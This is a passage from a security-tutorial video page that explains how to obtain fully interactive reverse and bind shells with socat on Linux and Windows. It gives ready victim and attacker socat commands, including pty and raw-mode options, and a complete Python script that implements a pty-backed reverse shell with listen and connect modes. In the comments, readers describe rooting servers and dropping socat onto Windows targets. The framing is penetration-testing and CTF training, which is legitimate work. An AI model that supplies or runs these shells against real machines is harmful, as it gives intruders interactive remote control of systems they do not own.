
How To Get A FULLY Interactive Reverse Shell in Linux OR Windows 

Jason Ford {JSON:SEC}
31K views

Brought to you by INE (AKA eLearnSecurity). Check out their range of training materials for all things tech here: get.ine.com/2h...
Netcat is an amazing tool, useful and versatile for penetration tests and even other IT administration tasks. But the shell it gives you is very limited for penetration testing: no terminal is attached to it, so there is no tab completion or command history, Ctrl-C kills the connection instead of the running command, and interactive programs such as editors do not work.
A reverse shell with socat gives you a much higher degree of interactivity, even letting you edit files from the command line, just like an SSH session.
Commands (192.168.1.1 stands for whichever host the other side connects to: the victim for a bind shell, the attacker for a reverse shell; -d -d only turns on verbose logging on the side that uses it):
Bind Shell
Victim Linux: socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
Victim Windows: socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
Attacker: socat - TCP4:192.168.1.1:4443
Reverse Shell
Victim Linux: socat TCP4:192.168.1.1:4443 EXEC:/bin/bash
Victim Windows: socat TCP4:192.168.1.1:4443 EXEC:'cmd.exe',pipes
Attacker: socat -d -d TCP4-LISTEN:4443 STDOUT
Note: EXEC:/bin/bash on its own still runs bash without a terminal. For a real TTY (tab completion, job control, Ctrl-C delivered to the remote process rather than to socat, editors working) add pty,stderr,setsid,sigint,sane to the EXEC address on the Linux victim and use file:`tty`,raw,echo=0 in place of - or STDOUT on the attacker side.
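The socat lines above only make the connection; what makes the shell fully interactive is running the shell on a pseudo-terminal and putting the attacker's own terminal into raw mode. The following is an added example, not code from the video or from JSON SEC, that re-implements in Python the two socat addresses that do this, EXEC:/bin/bash,pty,stderr,setsid,sigint,sane on the victim and file:`tty`,raw,echo=0 on the attacker, so that both halves and the EOF handling between them are visible. It is Linux/Unix only (pty and termios); the loopback address 127.0.0.1, the port 4443, the shell /bin/sh and all function names are assumptions for the demo, not values from the video.

```python
# Added example (not from the video or the JSON SEC channel): a minimal Python
# re-implementation of the two socat addresses that make a shell fully
# interactive, showing what "pty" and "raw,echo=0" actually do:
#   victim:   socat TCP4:<attacker>:4443 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
#   attacker: socat file:`tty`,raw,echo=0 TCP4-LISTEN:4443
# Linux/Unix only. 127.0.0.1, port 4443 and /bin/sh are demo assumptions.
import os
import pty
import select
import socket
import sys
import termios
import threading
import tty


def _write_all(fd, data):
    """os.write may be partial on sockets; loop until every byte is out."""
    while data:
        data = data[os.write(fd, data):]


def pump(left_rd, left_wr, right_rd, right_wr):
    """Bidirectional byte pump: left_rd -> right_wr and right_rd -> left_wr.
    Returns on EOF from either side; a pty master raises EIO once the shell
    has exited, and that is treated as EOF too."""
    while True:
        ready, _, _ = select.select([left_rd, right_rd], [], [])
        for fd in ready:
            try:
                data = os.read(fd, 4096)
            except OSError:        # EIO from the pty master after the shell exits
                data = b""
            if not data:
                return
            _write_all(right_wr if fd == left_rd else left_wr, data)


def serve_pty_shell(sock, shell="/bin/sh"):
    """Victim side, equivalent to EXEC:<shell>,pty,stderr,setsid,sigint,sane.
    pty.fork() gives the child a new session with the slave pty as controlling
    terminal; stdin/stdout/stderr all point at that pty, so the shell sees a tty."""
    pid, master = pty.fork()
    if pid == 0:
        try:
            os.execvp(shell, [shell, "-i"])
        finally:
            os._exit(127)          # never fall back into the parent's Python code
    try:
        pump(master, master, sock.fileno(), sock.fileno())
    finally:
        os.close(master)
        sock.close()               # tells the attacker side the shell is gone
        os.waitpid(pid, 0)


def attacker_relay(sock, in_fd=0, out_fd=1):
    """Attacker side, equivalent to file:`tty`,raw,echo=0. Raw mode stops the
    local terminal from acting on Ctrl-C, Ctrl-Z and line editing itself, so the
    keystrokes reach the remote pty. Applied only when in_fd really is a tty,
    so the same function works on pipes (used by loopback_demo below)."""
    saved = termios.tcgetattr(in_fd) if os.isatty(in_fd) else None
    try:
        if saved is not None:
            tty.setraw(in_fd)
        pump(in_fd, out_fd, sock.fileno(), sock.fileno())
    finally:
        if saved is not None:
            termios.tcsetattr(in_fd, termios.TCSADRAIN, saved)


def loopback_demo(commands=b"echo shell-$((20+22))\nexit\n", shell="/bin/sh"):
    """Reverse-shell direction on 127.0.0.1 in one process: the attacker listens,
    a victim thread connects and serves a pty shell, the attacker feeds `commands`
    through a pipe and returns everything the remote pty sent back."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))       # port 0: the kernel picks a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    def victim():
        with socket.create_connection(("127.0.0.1", port)) as s:
            serve_pty_shell(s, shell)
    threading.Thread(target=victim, daemon=True).start()
    conn, _ = listener.accept()
    listener.close()
    in_rd, in_wr = os.pipe()
    out_rd, out_wr = os.pipe()
    _write_all(in_wr, commands)           # in_wr stays open: EOF there would end the relay early
    attacker_relay(conn, in_rd, out_wr)   # returns once the remote shell exits and the socket closes
    conn.close()
    for fd in (in_rd, in_wr, out_wr):
        os.close(fd)
    with os.fdopen(out_rd, "rb") as captured:
        return captured.read()


if __name__ == "__main__":
    # python3 <this file> listen 4443                   attacker, run in a real terminal
    # python3 <this file> connect <attacker-ip> 4443    victim
    if len(sys.argv) >= 3 and sys.argv[1] == "listen":
        srv = socket.socket()
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", int(sys.argv[2])))
        srv.listen(1)
        attacker_relay(srv.accept()[0])
    elif len(sys.argv) >= 4 and sys.argv[1] == "connect":
        serve_pty_shell(socket.create_connection((sys.argv[2], int(sys.argv[3]))))
    else:
        sys.stdout.write(loopback_demo().decode(errors="replace"))
```

Run the listen side in a real terminal and the connect side on the victim, in the same direction as the socat reverse shell above. loopback_demo() exercises both halves over 127.0.0.1 inside one process with pipes standing in for the terminal; the bytes it returns include the shell prompt and the echoed command line, because the remote side now has a real pty doing the echo, which is exactly what a plain EXEC:/bin/bash shell lacks.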
Encrypted Bind / Reverse Shells
Read this article: erev0s.com/blo...
Links:
__________________________________________
Website: www.jsonsec.com
X: x.com/jsonsec
LinkedIn: / jasonford2
Github: www.github.com...
Buy me a ko-fi: ko-fi.com/jsonsec
About JSON SEC
___________________________________________
JSON SEC is a channel dedicated to helping you advance your cyber security career, whether you're on the Red Team or the Blue Team side, focusing on training and course reviews, exam prep guides, career guidance and advice, as well as hacking tutorials.
Please consider subscribing if you enjoyed this video.

Published: 15 Oct 2024

Comments: 44
@NeerajBhojwani-r4d 8 hours ago
You can usually upgrade the shell using the Python command to spawn the upgraded shell, but that doesn't work when Python isn't installed. This is the best way in those scenarios. Thanks for the simple and to-the-point video.
@mercury1803 3 years ago
Have you tried spawning a tty while using nc? You can also use the stty trick to make sure `Ctrl + C` doesn't kill the process.
@mercury1803 3 years ago
I can demonstrate this in TryHackMe's Discord if you want, RU-vid comments are slightly clunky...
@JSONSEC 3 years ago
As I said in the video, I've tried a lot of things like a fully interactive tty shell, adding key shortcuts etc. But nothing has worked so effortlessly and so smoothly as this.
@MarsTheProgrammer 2 years ago
The biggest selling point is that you can encrypt the connection with socat.
@Urbancorax2 3 years ago
Thank you for that. Now, show everybody how to socat using SSL, transfer files and something else interesting :)
@BellatrixLugosi 2 years ago
The problem is they don't have socat installed, or any compiler.
@JSONSEC 2 years ago
You'd be surprised how common it is.
@BellatrixLugosi 2 years ago
@JSONSEC I have rooted hundreds of Linux and BSD servers, and they don't have socat installed; the way I get a full tty shell is mostly using the Python pty module.
@Mike-cp1tj 6 months ago
But don't you need the target to have socat installed? On a Windows target isn't this super unlikely?
@JSONSEC 6 months ago
Pretty common on Linux; on Windows you can drop a PowerShell one-liner.
@unam456 1 year ago
Do Windows 11 core isolation and memory integrity protect against this type of attack? And what if I have filtered ports, a router with a firewall, NAT, antivirus and a PC firewall?
@JSONSEC 1 year ago
Oh gosh, that's way more than I anticipated for this video. I suppose the scope was more for CTFs.
@unam456 1 year ago
@JSONSEC But maybe you know if those things protect me against this type of attack? I'm worried because a person was trying to hack me.
@MartinGaertner 1 year ago
Very great video, thank you very much!
@chileaus 2 years ago
Is there a way to reverse shell over the internet?
@_hawk_8681 1 year ago
Well, if you want to do it over WAN, then make sure to look into port forwarding and SSH. You can probably use port forwarding with Metasploit to do hacking on the internet.
@Carinala8257 2 years ago
I run socat on a Windows machine in a cmd with admin rights, but unfortunately I only have user rights in the remote shell after a successful connection. Does anyone have a solution for this?
@_hawk_8681 1 year ago
Get the sudo password of the remote Linux machine. Once you have it, connect to it and then 'sudo su'; it will ask for the password, enter the password and you're now admin...
@joeljohnson5576 2 years ago
Great stuff man, thanks.
@saurabhkumar1976 3 years ago
Thanks for this 😊
@vikhyatverma4016 2 years ago
It'd be great if I could do that on Windows...
@marounahel8205 1 year ago
I really liked your video.
@JSONSEC 1 year ago
I really liked your comment.
@randomstatements8034 2 years ago
How would this work in Windows?
@JSONSEC 2 years ago
Simply drop the socat.exe file across and use the same commands :)
@Nexxal 1 year ago
@JSONSEC What exe file?
@itsme7570 1 year ago
Thank you!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!🎉🎉🎉🎉🎉🎉🎉🎉🎉
@SpamSandra-lh3nq 10 months ago
great!!!
@Hartley94 3 years ago
Thank you.
@BrianPrisbe 2 years ago
Awesome
@papahorse3347 3 years ago
Thanks so much, can you start doing some TryHackMe walkthrough videos? Your explaining is really good and it would be nice to learn more from you.
@JSONSEC 3 years ago
I plan on building my own machines and doing walkthroughs. I think there are plenty of other great guys that explain things just as well, if not better than me :)
@skyone9237 3 years ago
Gr8. ❤️❤️
@iakashx 2 years ago
Noice. 👍 Just wanna highlight some things because I ran into them while doing this. socat file:`tty`,raw,echo=0 tcp-listen:4444 This listener didn't work properly when I tried to get a reverse shell from the target (say PHP or any kind of exploit / nc rev shell etc.). Initially I thought this had something to do with bash/zsh. But it wasn't. Finally, I got a rev shell on nc first. Found socat was present on the target. Then I created another shell with socat. ✌✌ Edit: Modified php-rev-shell to directly give me a shell on socat. Better now. :)
@bendomino8476 3 years ago
This is good, but not every victim machine will have socat preinstalled.
@JSONSEC 3 years ago
You'd be surprised how many do. But if it doesn't, you can simply transfer the binary instead of an nc or a msfv shell.
2 years ago
@JSONSEC How would you do that? Is there a script I can install on the "victim" Windows computer that automatically installs socat and runs the command to connect? I have been trying for hours to set up a listener on a Kali Linux virtual machine and connect with my Windows computer. Can you help? Thanks.
@codermomo1792 3 months ago
@JSONSEC AV will not be happy.
@Firoz900 3 years ago
What? Are you serious?
@jasonford2877 3 years ago
Sure am. Of course it won't work for EVERY circumstance, but neither does netcat.
@Firoz900 3 years ago
@jasonford2877 Guru is always right!
@JSONSEC 3 years ago
Certainly not! Being wrong gives you a chance to learn! :)